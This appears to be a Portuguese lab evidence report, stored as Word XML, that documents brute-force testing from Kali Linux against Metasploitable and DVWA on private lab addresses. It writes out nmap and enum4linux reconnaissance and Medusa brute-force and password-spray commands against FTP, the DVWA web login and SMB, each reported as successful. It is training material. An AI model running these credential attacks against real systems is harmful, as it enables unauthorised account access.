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9224" w14:textId="7B5C9FEA" w:rsidR="00245353" w:rsidRDefault="003C3810">
      <w:r>
        <w:t>Evidência – Teste de Brute Force – Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6FC587" w14:textId="79F986B5" w:rsidR="003C3810" w:rsidRDefault="003C3810"/>
    <w:p w14:paraId="74B1D692" w14:textId="1FCCDCD9" w:rsidR="003C3810" w:rsidRDefault="003C3810">
      <w:r>
        <w:t xml:space="preserve">Nmap </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11412CDA" w14:textId="29E96043" w:rsidR="00E166C3" w:rsidRDefault="00E166C3">
      <w:r w:rsidRPr="00E166C3">
        <w:t>nmap -sV -p 21,22,80,445,139 192.168.0.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A06EA20" w14:textId="6281BCDD" w:rsidR="003C3810" w:rsidRDefault="003C3810">
      <w:r w:rsidRPr="003C3810">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0153ADAA" wp14:editId="7D03C46C">
            <wp:extent cx="5400040" cy="2001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66AB" w14:textId="366A75AE" w:rsidR="00561081" w:rsidRDefault="00561081"/>
    <w:p w14:paraId="36A844EC" w14:textId="00A555E2" w:rsidR="00561081" w:rsidRDefault="00561081">
      <w:r>
        <w:t>Chegando ftp open – Serviço Ativo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454C3B41" w14:textId="3DA62DFD" w:rsidR="00561081" w:rsidRDefault="00561081">
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00363B11">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>ftp 192.168.0.102</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5DD8B229" w14:textId="61DC5F65" w:rsidR="00561081" w:rsidRDefault="00561081">
      <w:r w:rsidRPr="00561081">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A578AA0" wp14:editId="5B6DDC30">
            <wp:extent cx="5239481" cy="164805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8A8B" w14:textId="6187BEFE" w:rsidR="00561081" w:rsidRDefault="00561081"/>
    <w:p w14:paraId="2FB708B1" w14:textId="133FD812" w:rsidR="00561081" w:rsidRDefault="00561081">
      <w:r>
        <w:t>Descobrir o usuário e senha para ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0C8C5E" w14:textId="074DACB4" w:rsidR="00561081" w:rsidRDefault="00561081">
      <w:r>
        <w:t>Criando nome de usuários e senhas comuns em diferentes arquivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D51B08D" w14:textId="73B98F5B" w:rsidR="00561081" w:rsidRDefault="00561081" w:rsidP="00D7499C">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00561081">
        <w:t>echo -e "user\nmsfadmin\nadmin\nroot" &gt; users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6476BDB8" w14:textId="4CA32368" w:rsidR="00561081" w:rsidRDefault="00561081" w:rsidP="00D7499C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00561081">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09DEF997" wp14:editId="2C9AE07F">
            <wp:extent cx="4625439" cy="2334476"/>
            <wp:effectExtent l="0" t="0" r="381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871" cy="2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1A42" w14:textId="650628C5" w:rsidR="00D7499C" w:rsidRDefault="00D7499C"/>
    <w:p w14:paraId="555033E7" w14:textId="1189DB05" w:rsidR="00D7499C" w:rsidRDefault="00D7499C" w:rsidP="00D7499C">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7499C">
        <w:t xml:space="preserve">echo -e "123456\npassword\nqwerty\nmsfadmin" &gt; pass.txt   </w:t>
      </w:r>
      <w:r>
        <w:t>(criar lista de senhas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31056A01" w14:textId="77777777" w:rsidR="00D7499C" w:rsidRDefault="00D7499C" w:rsidP="00D7499C">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B8CE9FA" w14:textId="02431CA0" w:rsidR="00D7499C" w:rsidRDefault="00D7499C" w:rsidP="00D7499C">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5304D511" wp14:editId="0ACD5503">
            <wp:extent cx="4328020" cy="172734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031" cy="17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02C1" w14:textId="7AD8766C" w:rsidR="00D7499C" w:rsidRDefault="00D7499C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D441275" w14:textId="099E121C" w:rsidR="00D7499C" w:rsidRDefault="00D7499C">
      <w:r>
        <w:t>Verificando os dois arquivos criados usuários e senhas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102976C5" w14:textId="6071E1D6" w:rsidR="00D7499C" w:rsidRDefault="00D7499C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D7499C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D6BD57D" wp14:editId="369DD7F0">
            <wp:extent cx="5400040" cy="48736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ABCE" w14:textId="0D971036" w:rsidR="00D7499C" w:rsidRDefault="00D7499C"/>
    <w:p w14:paraId="7755AFEC" w14:textId="497ECCD3" w:rsidR="00D7499C" w:rsidRDefault="00D7499C">
      <w:r>
        <w:t>Realizar o ataque para descobrir o usuário e senha para acessar via FTP, através da ferramenta Medusa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208496D1" w14:textId="728C0E3A" w:rsidR="00D7499C" w:rsidRDefault="00D7499C"/>
    <w:p w14:paraId="020AB54B" w14:textId="1F4BE414" w:rsidR="002C0665" w:rsidRDefault="002C0665">
      <w:r w:rsidRPr="002C0665">
        <w:t>medusa -h 192.168.0.102 -U users.txt -P pass.txt -M ftp -t 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A16FC6A" w14:textId="77777777" w:rsidR="00D7499C" w:rsidRDefault="00D7499C"/>
    <w:p w14:paraId="75A38715" w14:textId="3A250B74" w:rsidR="00D7499C" w:rsidRDefault="002C0665">
      <w:r>
        <w:t>resposta do ataque, onde tivemos um êxito Success destacado em amarelo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585CF23C" w14:textId="00C5BBCC" w:rsidR="002C0665" w:rsidRDefault="002C0665"/>
    <w:p w14:paraId="3CC225FA" w14:textId="3A3542E3" w:rsidR="002C0665" w:rsidRDefault="002C0665">
      <w:r w:rsidRPr="002C0665">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48264A79" wp14:editId="1D9D647F">
            <wp:extent cx="5400040" cy="2268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340" w14:textId="2CAAE4F0" w:rsidR="002C0665" w:rsidRDefault="002C0665">
      <w:r w:rsidRPr="002C0665">
        <w:t>ftp 192.168.0.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20990CA8" w14:textId="3B5C7642" w:rsidR="002C0665" w:rsidRDefault="002C0665">
      <w:r w:rsidRPr="002C0665">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="653194FF" wp14:editId="52F90CBF">
            <wp:extent cx="5400040" cy="3666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810B" w14:textId="4AB46143" w:rsidR="00D7499C" w:rsidRDefault="002C0665">
      <w:r>
        <w:t>Funcionou</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66248493" w14:textId="0A126796" w:rsidR="002C0665" w:rsidRDefault="00A13F4C">
      <w:r>
        <w:t>Agora iremos validar as vulnerabilidades na aplicação WEB, através do Medusa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1C9239" w14:textId="07CDECC4" w:rsidR="00A13F4C" w:rsidRDefault="00A13F4C"/>
    <w:p w14:paraId="0200BE80" w14:textId="1D71979D" w:rsidR="00D16EAC" w:rsidRDefault="00D16EAC">
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00363B11">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.0.106/dvwa/login.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="204F9CBC" w14:textId="192B3343" w:rsidR="00D16EAC" w:rsidRDefault="00D16EAC"/>
    <w:p w14:paraId="295A58AC" w14:textId="0DB3444B" w:rsidR="00D16EAC" w:rsidRDefault="00D16EAC">
      <w:r w:rsidRPr="00D16EAC">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="314FB0B6" wp14:editId="5DC6D3C5">
            <wp:extent cx="5400040" cy="25596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FA0" w14:textId="097E146E" w:rsidR="00D7499C" w:rsidRDefault="00D7499C"/>
    <w:p w14:paraId="3C9916B3" w14:textId="77777777" w:rsidR="00D16EAC" w:rsidRDefault="00D16EAC" w:rsidP="00D16EAC">
      <w:r>
        <w:t>Criando nome de usuários e senhas comuns em diferentes arquivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58089FDA" w14:textId="34C4E140" w:rsidR="00D16EAC" w:rsidRDefault="00D16EAC" w:rsidP="00D16EAC">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00561081">
        <w:t>echo -e "user\nmsfadmin\nadmin\nroot" &gt; users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB847AD" w14:textId="77777777" w:rsidR="00134213" w:rsidRDefault="00134213" w:rsidP="00134213">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7499C">
        <w:t xml:space="preserve">echo -e "123456\npassword\nqwerty\nmsfadmin" &gt; pass.txt   </w:t>
      </w:r>
      <w:r>
        <w:t>(criar lista de senhas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000213A5" w14:textId="0A753FC8" w:rsidR="00134213" w:rsidRDefault="00134213" w:rsidP="00134213">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F1C83D1" w14:textId="28984CF3" w:rsidR="00134213" w:rsidRDefault="00134213" w:rsidP="00134213">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Simulando o ataque pelo Medusa - WEB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347A0559" w14:textId="482BF110" w:rsidR="00134213" w:rsidRDefault="00134213" w:rsidP="00134213">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4891A675" w14:textId="77777777" w:rsidR="00134213" w:rsidRDefault="00134213" w:rsidP="00134213">
      <w:r>
        <w:t>medusa -h 192.168.0.106 -U users.txt -P pass.txt -M http \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ABC21B" w14:textId="77777777" w:rsidR="00134213" w:rsidRDefault="00134213" w:rsidP="00134213">
      <w:r>
        <w:t>-m PAGE: '/dvwa/login.php' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564232FD" w14:textId="77777777" w:rsidR="00134213" w:rsidRDefault="00134213" w:rsidP="00134213">
      <w:r>
        <w:t>-m FORM: 'username=^USER^&amp;password=^PASS^&amp;Login=Login' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2BF1D1" w14:textId="6F7AAD5F" w:rsidR="00134213" w:rsidRDefault="00134213" w:rsidP="00134213">
      <w:r>
        <w:t>-m 'FAIL=Login faleid' -t 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505A10FE" w14:textId="2A4AC74D" w:rsidR="00134213" w:rsidRDefault="00134213" w:rsidP="00134213"/>
    <w:p w14:paraId="11CCA573" w14:textId="5F93AEA1" w:rsidR="00134213" w:rsidRDefault="00134213" w:rsidP="00134213">
      <w:r w:rsidRPr="00134213">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F9F2CF5" wp14:editId="07F6B3AD">
            <wp:extent cx="5400040" cy="1381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C276" w14:textId="77777777" w:rsidR="00134213" w:rsidRDefault="00134213" w:rsidP="00134213">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44E26713" w14:textId="77777777" w:rsidR="00D16EAC" w:rsidRDefault="00D16EAC"/>
    <w:p w14:paraId="6ABAE407" w14:textId="08301E09" w:rsidR="00D7499C" w:rsidRDefault="002772CD">
      <w:r>
        <w:t>Resultado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD32B22" w14:textId="32CCA93C" w:rsidR="002772CD" w:rsidRDefault="00254D43">
      <w:r w:rsidRPr="00254D43">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AD5BD3B" wp14:editId="043650F6">
            <wp:extent cx="5400040" cy="2687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1A7" w14:textId="1B7BA03E" w:rsidR="00254D43" w:rsidRDefault="00254D43"/>
    <w:p w14:paraId="70BF2C62" w14:textId="43378745" w:rsidR="00254D43" w:rsidRDefault="00254D43">
      <w:r w:rsidRPr="00254D43">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75504FE6" wp14:editId="16EDFE0A">
            <wp:extent cx="5400040" cy="27101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4067" w14:textId="769BBA08" w:rsidR="00254D43" w:rsidRDefault="00254D43">
      <w:r>
        <w:t>Funcionou</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE12814" w14:textId="3D219E79" w:rsidR="00254D43" w:rsidRDefault="00254D43"/>
    <w:p w14:paraId="260F0007" w14:textId="656E5ECF" w:rsidR="0005611C" w:rsidRDefault="0005611C">
      <w:r>
        <w:t>Simulando um cenário comum em ambiente corporativo mal configurado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563824A8" w14:textId="42E32BBB" w:rsidR="0005611C" w:rsidRDefault="0005611C"/>
    <w:p w14:paraId="20117196" w14:textId="10EDBAC7" w:rsidR="0005611C" w:rsidRDefault="0005611C">
      <w:r w:rsidRPr="0005611C">
        <w:t>enum4linux -a  192.168.0.106 | tee enum4_output.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B232E67" w14:textId="07D69022" w:rsidR="0005611C" w:rsidRDefault="0005611C"/>
    <w:p w14:paraId="4D641921" w14:textId="3906FD5C" w:rsidR="00D37B68" w:rsidRDefault="00D37B68">
      <w:r w:rsidRPr="00D37B68">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CA631A6" wp14:editId="640F4640">
            <wp:extent cx="5400040" cy="35483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92C7" w14:textId="6E90F792" w:rsidR="00D37B68" w:rsidRDefault="00D37B68"/>
    <w:p w14:paraId="4A769FD6" w14:textId="206BDDA8" w:rsidR="00D37B68" w:rsidRDefault="00D37B68">
      <w:r w:rsidRPr="00D37B68">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58177F59" wp14:editId="12DC1705">
            <wp:extent cx="5400040" cy="21012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A67" w14:textId="6176F17A" w:rsidR="00D37B68" w:rsidRDefault="00D37B68">
      <w:r w:rsidRPr="00D37B68">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D3CF8D8" wp14:editId="5C73CC71">
            <wp:extent cx="5400040" cy="26866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BAC6" w14:textId="6299345D" w:rsidR="00D37B68" w:rsidRDefault="00D37B68"/>
    <w:p w14:paraId="2A7ABC76" w14:textId="0795F4B1" w:rsidR="00D37B68" w:rsidRDefault="00D37B68">
      <w:r w:rsidRPr="00D37B68">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CFC41EE" wp14:editId="6A0CC95D">
            <wp:extent cx="5400040" cy="34563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E01A" w14:textId="22768F11" w:rsidR="00D37B68" w:rsidRDefault="00D37B68"/>
    <w:p w14:paraId="395B508C" w14:textId="610599D9" w:rsidR="00D37B68" w:rsidRDefault="00D37B68">
      <w:r w:rsidRPr="00D37B68">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="121BD599" wp14:editId="19515A65">
            <wp:extent cx="5400040" cy="27971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CC6" w14:textId="75FA46BB" w:rsidR="00D37B68" w:rsidRDefault="00D37B68"/>
    <w:p w14:paraId="1D7868E6" w14:textId="009056F3" w:rsidR="00D37B68" w:rsidRDefault="00D37B68">
      <w:r w:rsidRPr="00D37B68">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ED5CBBE" wp14:editId="51609065">
            <wp:extent cx="5400040" cy="292481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D1A" w14:textId="3C4D4609" w:rsidR="00D37B68" w:rsidRDefault="00D37B68">
      <w:r w:rsidRPr="00D37B68">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3982BA7F" wp14:editId="3455027D">
            <wp:extent cx="5400040" cy="2697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BD3" w14:textId="62F48457" w:rsidR="00D37B68" w:rsidRDefault="00D37B68">
      <w:r w:rsidRPr="00D37B68">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="787A2199" wp14:editId="69AB1293">
            <wp:extent cx="5400040" cy="33743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DF" w14:textId="585A6A10" w:rsidR="00D37B68" w:rsidRDefault="00D37B68"/>
    <w:p w14:paraId="1FA3CD58" w14:textId="4AF1AA61" w:rsidR="00D37B68" w:rsidRDefault="00D37B68">
      <w:r w:rsidRPr="00D37B68">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="746CB0D8" wp14:editId="2464D2A4">
            <wp:extent cx="5400040" cy="3488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2C0C" w14:textId="620DDD57" w:rsidR="00D37B68" w:rsidRDefault="00D37B68"/>
    <w:p w14:paraId="48F146D2" w14:textId="1123A1E2" w:rsidR="00D37B68" w:rsidRDefault="00D37B68">
      <w:r>
        <w:t>Abrindo o arquivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F06219D" w14:textId="49443497" w:rsidR="00D37B68" w:rsidRDefault="00D37B68"/>
    <w:p w14:paraId="58A2534E" w14:textId="4A11ED57" w:rsidR="00D37B68" w:rsidRDefault="00D37B68">
      <w:r>
        <w:t>Less enum4linux_output.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCB0D88" w14:textId="04D2D59B" w:rsidR="00D37B68" w:rsidRDefault="00D37B68"/>
    <w:p w14:paraId="27593B74" w14:textId="2E0542B7" w:rsidR="00D37B68" w:rsidRDefault="00D37B68">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Criar uma lista de usuários</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADD2FEA" w14:textId="3283D7C9" w:rsidR="00D37B68" w:rsidRDefault="00D37B68"/>
    <w:p w14:paraId="06FA0135" w14:textId="66B9DD75" w:rsidR="00D37B68" w:rsidRDefault="007D4054" w:rsidP="007D4054">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="007D4054">
        <w:t>echo -e "user\nmsfadmin\nrservice" &gt; smb_users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0371CC2A" w14:textId="2B3316E0" w:rsidR="007D4054" w:rsidRDefault="007D4054" w:rsidP="007D4054">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="007D4054">
        <w:t>echo -e "password\n123456\nWelcome123\nmsfadmin" &gt; senhas_spray.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6201629E" w14:textId="6A314008" w:rsidR="007D4054" w:rsidRDefault="007D4054" w:rsidP="007D4054">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E725DAD" w14:textId="42452345" w:rsidR="007D4054" w:rsidRDefault="007D4054" w:rsidP="007D4054">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7166F5C4" w14:textId="614D2E15" w:rsidR="007D4054" w:rsidRDefault="007D4054" w:rsidP="007D4054">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="007D4054">
        <w:t>medusa -h 192.168.0.106 -U smb_users.txt -P senhas_spray.txt -M smbnt -t 2 T 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EDC1D4" w14:textId="0431D8EE" w:rsidR="00730BAB" w:rsidRDefault="00730BAB" w:rsidP="007D4054">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075BE00E" w14:textId="3A42D3F2" w:rsidR="00730BAB" w:rsidRDefault="00730BAB" w:rsidP="007D4054">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00730BAB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B351F0B" wp14:editId="7C789D98">
            <wp:extent cx="5400040" cy="35299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AFB" w14:textId="6C04551A" w:rsidR="00730BAB" w:rsidRDefault="00730BAB" w:rsidP="007D4054">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Testando o usuário e senha</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D41C333" w14:textId="5EEA6600" w:rsidR="00730BAB" w:rsidRDefault="00730BAB" w:rsidP="007D4054">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6157EC2F" w14:textId="3DFB843B" w:rsidR="00730BAB" w:rsidRDefault="00730BAB" w:rsidP="007D4054">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00730BAB">
        <w:t>smbclient -L //192.168.0.106 -U msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750CA160" w14:textId="0097C6D5" w:rsidR="00730BAB" w:rsidRDefault="00730BAB" w:rsidP="007D4054">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59B37CAB" w14:textId="0F1E72EE" w:rsidR="00730BAB" w:rsidRDefault="00730BAB" w:rsidP="007D4054">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00730BAB">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B2356F9" wp14:editId="0BD540AA">
            <wp:extent cx="5400040" cy="260096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DEA4" w14:textId="2DE30271" w:rsidR="00730BAB" w:rsidRDefault="00730BAB" w:rsidP="007D4054">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78E17ED7" w14:textId="463DFC55" w:rsidR="00730BAB" w:rsidRDefault="00730BAB" w:rsidP="007D4054">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Funcionou.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530634A0" w14:textId="7946BB45" w:rsidR="00730BAB" w:rsidRDefault="00730BAB" w:rsidP="007D4054">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="298B3AE2" w14:textId="0D4F89D9" w:rsidR="009A3F9C" w:rsidRDefault="009A3F9C" w:rsidP="007D4054">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Golismero </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B1D7A9" w14:textId="77777777" w:rsidR="009A3F9C" w:rsidRDefault="009A3F9C" w:rsidP="009A3F9C">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>SCAN com várias técnicas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7A0BB1" w14:textId="02AB2FBC" w:rsidR="009A3F9C" w:rsidRDefault="009A3F9C" w:rsidP="009A3F9C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>python2.7 /usr/bin/golismero scan http://192.168.0.106 -db metasploitable-linux-scan.db -no</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5301C1" w14:textId="17774DBE" w:rsidR="009A3F9C" w:rsidRDefault="009A3F9C" w:rsidP="009A3F9C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56EE298B" w14:textId="67740122" w:rsidR="009A3F9C" w:rsidRDefault="009A3F9C" w:rsidP="009A3F9C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">transforma em um relatório </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B817801" w14:textId="77777777" w:rsidR="009A3F9C" w:rsidRDefault="009A3F9C" w:rsidP="009A3F9C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python2.7 /usr/bin/golismero report relatorio-tasploitable-linux.html -db metasploitable-linux-scan.db  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314C68BD" w14:textId="77777777" w:rsidR="009A3F9C" w:rsidRDefault="009A3F9C" w:rsidP="009A3F9C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F67F2BE" w14:textId="70E58C83" w:rsidR="009A3F9C" w:rsidRDefault="009A3F9C" w:rsidP="009A3F9C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A67052" w14:textId="5B5AEAE8" w:rsidR="009A3F9C" w:rsidRDefault="009A3F9C" w:rsidP="007D4054">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C88D358" wp14:editId="2D9D6C79">
            <wp:extent cx="5400040" cy="172529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B4BA" w14:textId="37FCDB7B" w:rsidR="009A3F9C" w:rsidRDefault="009A3F9C" w:rsidP="007D4054">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A7CD4F9" w14:textId="1CB0F5B9" w:rsidR="009A3F9C" w:rsidRDefault="009A3F9C" w:rsidP="007D4054">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="009A3F9C">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D5390E6" wp14:editId="3CD04341">
            <wp:extent cx="5400040" cy="21259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D44" w14:textId="51E02031" w:rsidR="009A3F9C" w:rsidRDefault="009A3F9C" w:rsidP="007D4054">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71EB281A" w14:textId="624CAF92" w:rsidR="0005611C" w:rsidRDefault="009A3F9C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009A3F9C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32F86C9A" wp14:editId="069D378D">
            <wp:extent cx="5400040" cy="12992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F9F" w14:textId="2880D7FF" w:rsidR="0005611C" w:rsidRDefault="0005611C">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648ABA2F" w14:textId="39157C9C" w:rsidR="00D7499C" w:rsidRDefault="00D7499C"/>
    <w:p w14:paraId="085A36DB" w14:textId="07F71C4B" w:rsidR="00D7499C" w:rsidRDefault="00D7499C"/>
    <w:p w14:paraId="2E052D95" w14:textId="17B279C9" w:rsidR="00D7499C" w:rsidRDefault="00D7499C"/>
    <w:p w14:paraId="34F6C087" w14:textId="7944D0D5" w:rsidR="00D7499C" w:rsidRDefault="00D7499C"/>
    <w:p w14:paraId="600C7AC1" w14:textId="59CE3639" w:rsidR="00D7499C" w:rsidRDefault="00D7499C"/>
    <w:p w14:paraId="57030910" w14:textId="2A7F9B48" w:rsidR="00D7499C" w:rsidRDefault="00D7499C"/>
